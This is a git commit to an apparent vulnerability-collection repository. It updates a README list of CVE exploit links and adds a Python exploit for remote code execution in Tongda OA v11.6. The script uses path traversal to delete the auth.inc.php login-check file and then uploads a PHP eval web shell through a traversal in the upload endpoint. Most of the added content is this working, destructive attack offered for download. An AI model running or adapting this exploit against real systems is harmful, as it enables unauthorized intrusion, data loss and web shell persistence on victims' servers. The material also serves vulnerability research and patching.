add 通达OAv11.6版本漏洞复现分析&通达OA_v11.6_RCE_EXP.py

2025-06-20 18:00:35 +00:00 · 2020-08-19 16:53:22 +08:00 · 2020-08-19 16:53:22 +08:00 · c950817f81
commit c950817f81
parent 9425ceb1ef
3 changed files with 34 additions and 2 deletions
--- a/README.md
+++ b/README.md
@ -146,8 +146,8 @@
 - [CVE-2020-1947-Apache ShardingSphere UI YAML解析远程代码执行漏洞](https://github.com/jas502n/CVE-2020-1947)
 - [CVE-2020-0554：phpMyAdmin后台SQL注入](./CVE-2020-0554：phpMyAdmin后台SQL注入.md)
 - [泛微E-Mobile Ognl 表达式注入](./泛微e-mobile%20ognl注入.md)|[表达式注入.pdf](./books/表达式注入.pdf)
- [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce)
- [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行]()
+- [通达OA RCE漏洞](https://github.com/fuhei/tongda_rce)|[通达OAv11.6版本RCE复现分析+EXP](./books/通达OAv11.6版本漏洞复现分析.pdf)-[EXP下载](./tools/通达OA_v11.6_RCE_EXP.py)
+- [CVE-2020-10673-jackson-databind JNDI注入导致远程代码执行](https://github.com/0nise/vuldebug)
 - [CVE-2020-10199、CVE-2020-10204漏洞一键检测工具，图形化界面（Sonatype Nexus <3.21.1）](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204)
 - [CVE-2020-2555-Oracle Coherence 反序列化漏洞](https://github.com/wsfengfan/CVE-2020-2555)|[分析文章](https://paper.seebug.org/1141/)
 - [cve-2020-5260-Git凭证泄露漏洞](https://github.com/brompwnie/cve-2020-5260)
--- a/books/通达OAv11.6版本漏洞复现分析.pdf
+++ b/books/通达OAv11.6版本漏洞复现分析.pdf
--- a/tools/通达OA_v11.6_RCE_EXP.py
+++ b/tools/通达OA_v11.6_RCE_EXP.py
@ -0,0 +1,32 @@
+import requests
+
+# 通达OA v11.6 RCE EXP
+# 注意，会删除 auth.inc.php 文件，这个文件是判断用户是否登陆的文件，如果没有登陆就不能上传，所以把这个文件删掉就可以成功上传webshell了。
+target = "http://127.0.0.1:1234/"
+payload = "<?php eval($_POST['pass']);?>"
+print(
+    "[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA"
+)
+input("Press enter to continue")
+print("[*]Deleting auth.inc.php....")
+url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
+requests.get(url=url)
+print("[*]Checking if file deleted...")
+url = target + "/inc/auth.inc.php"
+page = requests.get(url=url).text
+if 'No input file specified.' not in page:
+    print("[-]Failed to deleted auth.inc.php")
+    exit(-1)
+print("[+]Successfully deleted auth.inc.php!")
+print("[*]Uploading payload...")
+url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
+files = {'FILE1': ('deconf.php', payload)}
+requests.post(url=url, files=files)
+url = target + "/_deconf.php"
+page = requests.get(url=url).text
+
+if 'No input file specified.' not in page:
+    print("[+]Filed Uploaded Successfully")
+    print("[+]URL:", url)
+else:
+    print("[-]Failed to upload file")